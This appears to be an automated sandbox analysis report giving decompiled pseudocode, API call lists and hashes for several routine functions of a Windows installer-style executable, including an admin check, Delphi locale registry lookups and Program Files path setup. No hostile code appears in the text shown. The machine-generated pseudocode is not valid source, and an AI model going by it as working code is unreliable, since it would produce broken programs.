                                                            0x005c7d85
                                                            0x005c7d85
                                                            0x005c7eb6
                                                            0x005c7eb9
                                                            0x005c7ebc
                                                            0x005c7eca
                                                            0x005c7eca
                                                            0x005c7d68
                                                            0x005c7cf4
                                                            0x005c7cf4
                                                            0x005c7ed2
                                                            0x005c7edb
                                                            0x005c7edb

                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
                                                            • GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
                                                            • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
                                                            • FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                            • API String ID: 2691416632-1888249752
                                                            • Opcode ID: 1e224452f98f28684b28cd542a9aef5b7292b81c784e0a64638696cbd7ae50c3
                                                            • Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
                                                            • Opcode Fuzzy Hash: 1e224452f98f28684b28cd542a9aef5b7292b81c784e0a64638696cbd7ae50c3
                                                            • Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0040E2C4(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t112);
				_push(0x40e4e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040DAF8( &_v542, E0040B278(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040E4F0);
					return E0040A1C8( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40e4cc);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040E0D4( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040E5DC, 0, 0, 0,  &_v20) == 0) {
								_v12 = E00406F0C(_v20);
								RegQueryValueExW(_v16, E0040E5DC, 0, 0, _v12,  &_v20);
								E0040B2DC(_t97, _v12);
							}
						} else {
							_v12 = E00406F0C(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E0040B2DC(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040E4D3);
						if(_v12 != 0) {
							E00406F28(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                            0x0040e2c5
                                                            0x0040e2c7
                                                            0x0040e2ce
                                                            0x0040e2d0
                                                            0x0040e2d6
                                                            0x0040e2dd
                                                            0x0040e2de
                                                            0x0040e2e3
                                                            0x0040e2e6
                                                            0x0040e2ed
                                                            0x0040e319
                                                            0x0040e2ef
                                                            0x0040e2fd
                                                            0x0040e2fd
                                                            0x0040e326
                                                            0x0040e4d3
                                                            0x0040e4d5
                                                            0x0040e4d8
                                                            0x0040e4db
                                                            0x0040e4e8
                                                            0x0040e32c
                                                            0x0040e32e
                                                            0x0040e346
                                                            0x0040e34d
                                                            0x0040e3ed
                                                            0x0040e3ef
                                                            0x0040e3f0
                                                            0x0040e3f5
                                                            0x0040e3f8
                                                            0x0040e406
                                                            0x0040e427
                                                            0x0040e476
                                                            0x0040e480
                                                            0x0040e498
                                                            0x0040e4a2
                                                            0x0040e4a2
                                                            0x0040e429
                                                            0x0040e431
                                                            0x0040e44b
                                                            0x0040e455
                                                            0x0040e455
                                                            0x0040e4a9
                                                            0x0040e4ac
                                                            0x0040e4af
                                                            0x0040e4b8
                                                            0x0040e4bd
                                                            0x0040e4bd
                                                            0x0040e4cb
                                                            0x0040e353
                                                            0x0040e368
                                                            0x0040e36f
                                                            0x00000000
                                                            0x0040e371
                                                            0x0040e386
                                                            0x0040e38d
                                                            0x00000000
                                                            0x0040e38f
                                                            0x0040e3a4
                                                            0x0040e3ab
                                                            0x00000000
                                                            0x0040e3ad
                                                            0x0040e3c2
                                                            0x0040e3c9
                                                            0x00000000
                                                            0x0040e3cb
                                                            0x0040e3e0
                                                            0x0040e3e7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040e3e7
                                                            0x0040e3c9
                                                            0x0040e3ab
                                                            0x0040e38d
                                                            0x0040e36f
                                                            0x0040e34d

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                            • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                            • API String ID: 2701450724-3496071916
                                                            • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                            • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                            • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                            • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC23C, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 65%
                                                            			E006AC23C(void* __ebx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				void* _t54;
				intOrPtr _t65;
				intOrPtr _t73;
				unsigned int _t77;
				void* _t80;
				char _t82;
				char _t84;
				intOrPtr _t89;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t112;
				intOrPtr _t118;
				void* _t129;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t174;
				intOrPtr _t182;
				intOrPtr _t183;

				_t128 = __ebx;
				_t182 = _t183;
				_t129 = 7;
				do {
					_push(0);
					_push(0);
					_t129 = _t129 - 1;
					_t184 = _t129;
				} while (_t129 != 0);
				_push(_t182);
				_push(0x6ac586);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				E005C7430( &_v12);
				E0040A5A8(0x6d6534, _v12);
				E005C745C( &_v16);
				E0040A5A8(0x6d6538, _v16);
				E005C7488( &_v20, __esi, _t182, _t184);
				E0040A5A8(0x6d653c, _v20);
				E005C7530( *0x6d67dd & 0x000000ff, __ebx,  &_v24, __esi);
				E0040A5A8(0x6d6540, _v24);
				_t54 = E00429D18();
				_t185 = _t54 - 2;
				if(_t54 != 2) {
					E0040A1C8(0x6d6544);
				} else {
					E005C6D5C(L"SystemDrive", _t129,  &_v28, _t185);
					E0040A5A8(0x6d6544, _v28);
				}
				if( *0x6d6544 == 0) {
					_t118 =  *0x6d6534; // 0x0
					E005C53A0(_t118,  &_v32);
					E0040A5A8(0x6d6544, _v32);
					_t187 =  *0x6d6544;
					if( *0x6d6544 == 0) {
						E0040A5A8(0x6d6544, 0x6ac5c4);
					}
				}
				E006AC0D0(1, L"ProgramFilesDir", _t187); // executed
				E0040A5A8(0x6d6548, _v36);
				_t188 =  *0x6d6548;
				if( *0x6d6548 == 0) {
					_t174 =  *0x6d6544; // 0x0
					E0040B4C8(0x6d6548, L"\\Program Files", _t174);
				}
				E006AC0D0(1, L"CommonFilesDir", _t188); // executed
				E0040A5A8(0x6d654c, _v40);
				if( *0x6d654c == 0) {
					_t112 =  *0x6d6548; // 0x0
					E005C4EA4(_t112,  &_v44);
					E0040B4C8(0x6d654c, L"Common Files", _v44);
				}
				_t190 =  *0x6d67dd;
				if( *0x6d67dd != 0) {
					E006AC0D0(2, L"ProgramFilesDir", _t190); // executed
					E0040A5A8(0x6d6550, _v48);
					_t191 =  *0x6d6550;
					if( *0x6d6550 == 0) {
						E0060CD28(L"Failed to get path of 64-bit Program Files directory", _t128);
					}
					E006AC0D0(2, L"CommonFilesDir", _t191); // executed
					E0040A5A8(0x6d6554, _v52);
					if( *0x6d6554 == 0) {
						E0060CD28(L"Failed to get path of 64-bit Common Files directory", _t128);
					}
				}
				if( *0x6d68ac == 0) {
					L25:
					__eflags =  *0x6d67dc;
					if( *0x6d67dc == 0) {
						_t65 =  *0x6d6534; // 0x0
						E005C4EA4(_t65,  &_v60);
						E0040B4C8(0x6d6564, L"COMMAND.COM", _v60); // executed
					} else {
						_t73 =  *0x6d6538; // 0x0
						E005C4EA4(_t73,  &_v56);
						E0040B4C8(0x6d6564, L"cmd.exe", _v56);
					}
					E006AC180(); // executed
					__eflags = 0;
					_pop(_t158);
					 *[fs:eax] = _t158;
					_push(E006AC58D);
					return E0040A228( &_v60, 0xd);
				} else {
					_t77 =  *0x6d67f0; // 0xa0042ee
					if(_t77 >> 0x10 < 0x600) {
						goto L25;
					} else {
						_t80 =  *0x6d68ac(0x6cd7f4, 0x8000, 0,  &_v8); // executed
						if(_t80 != 0) {
							_t82 =  *0x6d68ac(0x6cd804, 0x8000, 0,  &_v8); // executed
							__eflags = _t82;
							if(_t82 != 0) {
								_t84 =  *0x6d68ac(0x6cd814, 0x8000, 0,  &_v8); // executed
								__eflags = _t84;
								if(_t84 != 0) {
									goto L25;
								} else {
									_push(_t182);
									_push(0x6ac516);
									_push( *[fs:eax]);
									 *[fs:eax] = _t183;
									E0040C8BC();
									__eflags = 0;
									_pop(_t163);
									 *[fs:eax] = _t163;
									_push(E006AC51D);
									_t89 = _v8;
									_push(_t89);
									L0043C214();
									return _t89;
								}
							} else {
								_push(_t182);
								_push(0x6ac4c3);
								_push( *[fs:eax]);
								 *[fs:eax] = _t183;
								E0040C8BC();
								__eflags = 0;
								_pop(_t165);
								 *[fs:eax] = _t165;
								_push(E006AC4CA);
								_t94 = _v8;
								_push(_t94);
								L0043C214();
								return _t94;
							}
						} else {
							_push(_t182);
							_push(0x6ac470);
							_push( *[fs:eax]);
							 *[fs:eax] = _t183;
							E0040C8BC();
							_pop(_t167);
							 *[fs:eax] = _t167;
							_push(E006AC477);
							_t99 = _v8;
							_push(_t99);
							L0043C214();
							return _t99;
						}
					}
				}
			}





































                                                            0x006ac23c
                                                            0x006ac23d
                                                            0x006ac23f
                                                            0x006ac244
                                                            0x006ac244
                                                            0x006ac246
                                                            0x006ac248
                                                            0x006ac248
                                                            0x006ac248
                                                            0x006ac24d
                                                            0x006ac24e
                                                            0x006ac253
                                                            0x006ac256
                                                            0x006ac25c
                                                            0x006ac269
                                                            0x006ac271
                                                            0x006ac27e
                                                            0x006ac286
                                                            0x006ac293
                                                            0x006ac2a2
                                                            0x006ac2af
                                                            0x006ac2b4
                                                            0x006ac2b9
                                                            0x006ac2bc
                                                            0x006ac2df
                                                            0x006ac2be
                                                            0x006ac2c6
                                                            0x006ac2d3
                                                            0x006ac2d3
                                                            0x006ac2eb
                                                            0x006ac2f0
                                                            0x006ac2f5
                                                            0x006ac302
                                                            0x006ac307
                                                            0x006ac30e
                                                            0x006ac31a
                                                            0x006ac31a
                                                            0x006ac30e
                                                            0x006ac329
                                                            0x006ac336
                                                            0x006ac33b
                                                            0x006ac342
                                                            0x006ac34e
                                                            0x006ac354
                                                            0x006ac354
                                                            0x006ac363
                                                            0x006ac370
                                                            0x006ac37c
                                                            0x006ac381
                                                            0x006ac386
                                                            0x006ac398
                                                            0x006ac398
                                                            0x006ac39d
                                                            0x006ac3a4
                                                            0x006ac3b0
                                                            0x006ac3bd
                                                            0x006ac3c2
                                                            0x006ac3c9
                                                            0x006ac3d0
                                                            0x006ac3d0
                                                            0x006ac3df
                                                            0x006ac3ec
                                                            0x006ac3f8
                                                            0x006ac3ff
                                                            0x006ac3ff
                                                            0x006ac3f8
                                                            0x006ac40b
                                                            0x006ac51d
                                                            0x006ac51d
                                                            0x006ac524
                                                            0x006ac54a
                                                            0x006ac54f
                                                            0x006ac561
                                                            0x006ac526
                                                            0x006ac529
                                                            0x006ac52e
                                                            0x006ac540
                                                            0x006ac540
                                                            0x006ac566
                                                            0x006ac56b
                                                            0x006ac56d
                                                            0x006ac570
                                                            0x006ac573
                                                            0x006ac585
                                                            0x006ac411
                                                            0x006ac411
                                                            0x006ac41e
                                                            0x00000000
                                                            0x006ac424
                                                            0x006ac434
                                                            0x006ac43c
                                                            0x006ac487
                                                            0x006ac48d
                                                            0x006ac48f
                                                            0x006ac4da
                                                            0x006ac4e0
                                                            0x006ac4e2
                                                            0x00000000
                                                            0x006ac4e4
                                                            0x006ac4e6
                                                            0x006ac4e7
                                                            0x006ac4ec
                                                            0x006ac4ef
                                                            0x006ac4fa
                                                            0x006ac4ff
                                                            0x006ac501
                                                            0x006ac504
                                                            0x006ac507
                                                            0x006ac50c
                                                            0x006ac50f
                                                            0x006ac510
                                                            0x006ac515
                                                            0x006ac515
                                                            0x006ac491
                                                            0x006ac493
                                                            0x006ac494
                                                            0x006ac499
                                                            0x006ac49c
                                                            0x006ac4a7
                                                            0x006ac4ac
                                                            0x006ac4ae
                                                            0x006ac4b1
                                                            0x006ac4b4
                                                            0x006ac4b9
                                                            0x006ac4bc
                                                            0x006ac4bd
                                                            0x006ac4c2
                                                            0x006ac4c2
                                                            0x006ac43e
                                                            0x006ac440
                                                            0x006ac441
                                                            0x006ac446
                                                            0x006ac449
                                                            0x006ac454
                                                            0x006ac45b
                                                            0x006ac45e
                                                            0x006ac461
                                                            0x006ac466
                                                            0x006ac469
                                                            0x006ac46a
                                                            0x006ac46f
                                                            0x006ac46f
                                                            0x006ac43c
                                                            0x006ac41e

                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
                                                            • CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
                                                            • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                            • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                            • Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
                                                            • Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                            • Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E00410BF4(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t133;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x6c5c50, 8 << 2);
				_pop(_t194);
				_v56 =  *0x6c5c50;
				_v52 = E004110A4( *0x006C5C54);
				_v48 = E004110B4( *0x006C5C58);
				_v44 = E004110C4( *0x006C5C5C);
				_v40 = E004110D4( *0x006C5C60);
				_v36 = E004110D4( *0x006C5C64);
				_v32 = E004110D4( *0x006C5C68);
				_v28 =  *0x006C5C6C;
				memcpy( &_v92, 0x6c5c70, 9 << 2);
				_t196 = _t194;
				_v88 = 0x6c5c70;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x6c5c94; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E004110E4( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x6d2644 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x6d2644 != 0) {
							_t191 =  *0x6d2644(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x6d2648 != 0) {
									_t191 =  *0x6d2648(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x6c5c9c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x6d2644 != 0) {
						_t142 =  *0x6d2644(1,  &_v92);
					}
					if(_t142 == 0) {
						_t133 = LoadLibraryA(_v80); // executed
						_t142 = _t133;
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0041057C(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x6c5c4c; // 0x0
									 *_v20 = _t126;
									 *0x6c5c4c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x6d2648 != 0) {
							_t142 =  *0x6d2648(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x6c5c98; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x6d2644(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x6d2644 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x6d2644(5,  &_v92);
						}
						return _t191;
					}
				}
			}








































                                                            0x00410c08
                                                            0x00410c0e
                                                            0x00410c10
                                                            0x00410c13
                                                            0x00410c20
                                                            0x00410c2d
                                                            0x00410c3a
                                                            0x00410c47
                                                            0x00410c54
                                                            0x00410c61
                                                            0x00410c6a
                                                            0x00410c78
                                                            0x00410c7a
                                                            0x00410c7b
                                                            0x00410c81
                                                            0x00410c87
                                                            0x00410c8e
                                                            0x00410c90
                                                            0x00410c96
                                                            0x00410c9c
                                                            0x00410cac
                                                            0x00000000
                                                            0x00410cb1
                                                            0x00410cbe
                                                            0x00410cc3
                                                            0x00410cc5
                                                            0x00410cc7
                                                            0x00410cc7
                                                            0x00410ccd
                                                            0x00410cd0
                                                            0x00410cd8
                                                            0x00410ce2
                                                            0x00410ce5
                                                            0x00410cea
                                                            0x00410d05
                                                            0x00410cec
                                                            0x00410cf8
                                                            0x00410cf8
                                                            0x00410d08
                                                            0x00410d11
                                                            0x00410d2a
                                                            0x00410d2c
                                                            0x00410dee
                                                            0x00410dee
                                                            0x00410df8
                                                            0x00410e06
                                                            0x00410e06
                                                            0x00410e0a
                                                            0x00410e57
                                                            0x00410e59
                                                            0x00410e60
                                                            0x00410e6a
                                                            0x00410e78
                                                            0x00410e78
                                                            0x00410e7c
                                                            0x00410e7e
                                                            0x00410e83
                                                            0x00410e89
                                                            0x00410e99
                                                            0x00410e9e
                                                            0x00410e9e
                                                            0x00410e7c
                                                            0x00000000
                                                            0x00410e0c
                                                            0x00410e10
                                                            0x00410e4b
                                                            0x00410e55
                                                            0x00000000
                                                            0x00410e18
                                                            0x00410e1b
                                                            0x00410e23
                                                            0x00000000
                                                            0x00410e3c
                                                            0x00410e42
                                                            0x00410e47
                                                            0x00000000
                                                            0x00000000
                                                            0x00410ea1
